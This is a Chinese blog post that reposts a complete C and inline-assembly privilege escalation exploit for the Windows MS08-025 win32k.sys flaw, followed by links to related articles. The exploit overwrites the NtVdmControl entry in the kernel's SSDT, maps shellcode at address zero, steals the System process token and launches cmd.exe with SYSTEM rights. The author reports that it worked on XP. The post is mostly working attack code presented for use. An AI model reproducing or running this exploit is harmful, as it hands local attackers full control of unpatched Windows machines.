MS08-025通过覆盖SSDT表进行执行shellcode

最新推荐文章于 2023-08-17 18:37:34 发布
最新推荐文章于 2023-08-17 18:37:34 发布
阅读量1k 收藏
点赞数
分类专栏: windows底层核心編程 文章标签: null system cmd 测试 xp c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2295657
版权
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行

#include <stdio.h>
#include <windows.h>

typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,
                                       PVOID            *BaseAddress,
                                       ULONG                ZeroBits,
                                       PULONG           RegionSize,
                                       ULONG                AllocationType,
                                       ULONG                Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
    printf("%s:%x/n", msg, GetLastError());
    ExitProcess(0);
}
ZWVDMCONTROL    ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;

_declspec(naked) int ShellCode()
{

      if ( OsVersionInfo.dwMinorVersion == 1 ) {

       __asm {

               nop
               nop
               nop
               nop
               nop
               nop

               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
               Mov eax,[eax]

               mov esi,[eax+0x220]
               mov eax,esi

searchXp:

               mov eax,[eax+0x88]
               sub eax,0x88
               mov edx,[eax+0x84]
               cmp edx,0x4 // Find System Process
               jne searchXp

               mov eax,[eax+0xc8] // 获取system进程的token
               mov [esi+0xc8],eax // 修改当前进程的token

               ret 8

       }
   }
   if ( OsVersionInfo.dwMinorVersion == 2 ) {

       __asm {

           nop
               nop
               nop
               nop
               nop
               nop

               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
               Mov eax,[eax]

               mov esi,[eax+0x220]
               mov eax,esi

search2003:

               mov eax,[eax+0x98]
               sub eax,0x98
               mov edx,[eax+0x94]
                cmp edx,0x4 // Find System Process
               jne search2003

               mov eax,[eax+0xd8] // 获取system进程的token
               mov [esi+0xd8],eax // 修改当前进程的token
               ret 8

       }
   }


}

void InitTrampoline()
{

   PNTALLOCATE NtAllocateVirtualMemory;
   LPVOID       addr = (LPVOID)3;
   DWORD       dwShellSize=0x1000;
   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0
                               "/xc3";               // retn

   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");

   if( !NtAllocateVirtualMemory )
       exit(0);

   NtAllocateVirtualMemory(   (HANDLE)-1,
                               &addr,
                               0,
                               &dwShellSize,
                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                               PAGE_EXECUTE_READWRITE );

   if( (PULONG)addr )
   {
       printf("/n[++] Error Allocating memory/n");
       exit(0);
   }


   *(PULONG*)(trampoline+1)=(PULONG)ShellCode;
   memcpy(NULL,trampoline,sizeof(trampoline)-1);
}
int Callback_Overview()
{
   printf("/n");
   printf("=====================================================================   /n");
   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");
   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");
   printf("=====================================================================   /n");
   printf("+ References:/n");
   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");
   printf(" http://hi.baidu.com/vessial/n/n");
   return 1;
}

void GetFunction()
{
    HANDLE    hNtdll,hNtos;
   
    hNtdll = LoadLibrary("ntdll.dll");
    if(hNtdll == NULL)
        ErrorQuit("LoadLibrary failed./n");
       
    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
    if(ZwVdmControl == NULL)
        ErrorQuit("GetProcAddress failed./n");
              
    FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{

   //PULONG   PntVdmControl=0x805F0DB0;
PULONG   PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4获得
   
    
   STARTUPINFOA                stStartup;
   PROCESS_INFORMATION            pi;


   Callback_Overview();
   GetFunction();
   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

   if ( OsVersionInfo.dwMajorVersion != 5 ) {

       printf( "Not NT5 system/n" );
       ExitProcess( 0 );
   }
   //Get Operatiny System Version
       
   InitTrampoline();

   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表,覆盖后结果为0x0
   printf("/n[+] Executing Shellcode.../n");

   ZwVdmControl(0, NULL);//这里就是call 0x0了,跳转执行我们的shellcode,哈哈:)
   GetStartupInfo( &stStartup );

   CreateProcess( NULL,
       "cmd.exe",
       NULL,
       NULL,
       TRUE,
       NULL,
       NULL,
       NULL,
       &stStartup,
       &pi );   //此时创建的cmd.exe是SYSTEM权限

  
   printf("[+] Exiting.../n");

   return TRUE;
}
在XP测试成功,下面的第一个cmd是SYSTEM权限,这是我们提权后的,一个cmd是test权限 
iiprogram
关注
专栏目录
利用自定义堆栈进行 Shellcode 开发
2301_77498991的博客
04-12 573
最近学习了下 BRC4 作者1月发的博客 Hiding In PlainSight - Indirect Syscall is Dead!
Windows 内核漏洞 ms08025 分析
04-14 1022
4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows Vista
MS08-025:Microsoft Windows内核的特权提升漏洞
weixin_34138521的博客
07-16 303
MS08-025:Microsoft Windows内核的特权提升漏洞 发布日期: 四月 8, 2008 版本: 1.0 摘要: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地***者可以完全控制受影响的系统。 ***者可随后安装程序;查看、更改或删除数据;或者创建新帐户。 建议。  Microsoft 建议客户尽早应用此更新。 受影响...
普通恶意代码技术分析与检测
weixin_30279315的博客
03-12 368
创建时间:2008-03-07文章属性:原创文章提交:fleshwound (fleshwound_at_126.com)fleshwound(fleshwound@smatrix.org)http://www.smatrix.org1 引言  近些年来,恶意代码依赖一些特殊的Native API函数和内核系统函数进行感染、传播、隐藏的这种趋势愈加明显代码,并大量的使用了多重加密壳、驱动关联壳、变...
如何使用C#在Windows中利用系统调用执行Shellcode注入
qq_57222058的博客
06-24 1320
前言 在通过Sektor7恶意软件开发必修课程学习了如何使用C语言编写Shellcode注入工具之后,我希望尝试如何在C#中执行相同的操作。实际上,使用P/Invoke来运行类似的Win32 API调用,并编写一个与Sektor7类似的简单注入工具非常容易。我注意到其中的最大区别是,没有直接等效的方法来混淆API调用。在对BloodHound Slack频道进行了一些研究和提问之后,在@TheWover和@NotoriousRebel的帮助下,我发现有两个主要的领域可以进行研究,一个是使用本地Wi...
SSDT-Setup-CHS
02-22
SSDT-Setup-CHS.exe SSDT-Setup-CHS.exe SSDT-Setup-CHS.exe
驱动级的隐藏进程代码,在驱动层通过替换ssdt地址中的函数来隐藏进程...
06-26
当用户模式的程序调用一个系统服务时,实际的执行是在SSDT中的相应函数中进行的。 隐藏进程的关键在于找到并替换SSDT中的特定函数,这些函数通常与进程管理和监视有关,如 ZwQuerySystemInformation 或 ...
SSDT.rar_SSDT-HOOK_ssdt
09-19
SSDT(System Service Dispatch Table,系统服务调度)是Windows操作系统中的一个重要概念,它是一个包含系统服务函数指针的,这些服务函数提供了操作系统内核与用户模式应用程序之间的接口。在Windows NT架构的...
华硕B85M-G 黑苹果专用SSDT
12-21
已经修复电源键长按弹窗,完美睡眠,USB设备重命名,H_EC改名等ACPI问题 需要配合定制USB实现休眠。
ssdt.rar_SSDT DELPHI_SSDT-hook delphi_Table_delphi ssdt_ssdt
09-22
标题“ssdt.rar_SSDT DELPHI_SSDT-hook delphi_Table_delphi ssdt_ssdt”暗示了这是一个与Delphi编程语言相关的项目,它涉及到了SSDT的查看、检测以及挂钩(hooking)技术。Delphi是一种强大的面向对象的编程语言,...
ms08025利用程序
10-03
ms08025利用程序ms08025利用程序ms08025利用程序ms08025利用程序
王宇:NtVDM子系统拾趣
05-29
9月25日,SyScan360 2013国际前瞻信息安全会议在北京国家会议中心举行。360安全研究工程师王宇发题为《NtVdm子系统拾趣》的演讲,针对Windows组件NtVdm子系统的安全性进行深入分析。
一文读懂远程线程注入
最新发布
2201_75571291的博客
08-17 474
在红队行动中,红队的目的都是要在不暴露自身行动的前提下,向蓝队发动攻击。他们使用各种技术和程序来隐藏C2连接和数据流。攻击活动的第一步是获得初始访问权。他们会使用定制的恶意软件和有效载荷来躲避防杀软和EDR等防御工具。本文涉及知识点实操练习:[DLL注入型病毒实验](https://www.hetianlab.com/expc.do?wemedia)(通过实验了解DLL注入型病毒的攻击过程)进程注入是用来逃避防御机制的重要技术之一。
无驱动执行Ring0代码
wowbell的专栏
02-23 1057
<br />// 原理:通过/Device/PhysicalMemory修改NtVdmControl入口,跳转到Ring0Code<br /> //************************************************************************<br /> #include<br /> #include<br /> #include<br /><br /> #pragma comment (lib,"ntdll.lib") // Copy From
在NT系列操作系统里让自己“消失”
竹君子之家
09-10 1727
创建时间:2004-03-06文章属性:原创文章提交:SoBeIt (kinsephi_at_hotmail.com)===================[ 在NT系列操作系统里让自己“消失”]==================                                               SoBeIt            作者:Holy_Father     
NtDLL的API
伤了
04-14 775
转帖From:郁金香的csdn博客http://blog.csdn.net/kkksi13996362600/archive/2009/03/05/3959312.aspx   1. 内容 2. 介绍 3. 文件 3.1 NtQueryDirectoryFile 3.2 NtVdmControl 4. 进程 5. 注册 5.1 NtEnumerateKey 5.2 NtEnu...
20145212罗天晨 注入shellcode实验及Retuen-to-libc实验
weixin_30483013的博客
03-03 154
注入shellcode实验 实验步骤 一、准备一段shellcode 二、设置环境 Bof攻击防御技术 1.从防止注入的角度来看:在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。 2.GCC中的编译器有堆栈保护技术(结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆...
读取SSDT当前函数地址
weixin_30642267的博客
05-14 80
#include "ntddk.h" VOID DriverUnload(PDRIVER_OBJECT driver) { DbgPrint("卸载成功\n\r"); } typedef struct _ServiceDescriptorTable { PVOID ServiceTableBase; PVOID ServiceCounterTab...
编写通用内核shellcode
08-28 1404
 一、多个内核漏洞的出现将研究者的目光从ring3引向了ring0 最近曝光的ms08-025漏洞,受影响的系统包含了微软出版的几乎所有NT体系结构的版本, 引起了不少研究者的兴趣,漏洞曝光不久就在网上出现了利用程序。基于内核漏洞的溢出, 为我们获取系统的ring0执行权限打开了方便之门,通过这类漏洞提升本地执行权限,获取 system权限执行级别。 目前流传的利用程序,ring0 shellco
SSDT Hook 驱动:导出与写入SSDT的工具
通过替换原始的SSDT项,可以修改操作系统的正常行为,从而拦截系统调用,或者修改系统调用的返回值。这可以用于实现各种功能,例如防止恶意软件检测、监控系统调用以进行安全审计、或是实现某些特定的系统修改。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值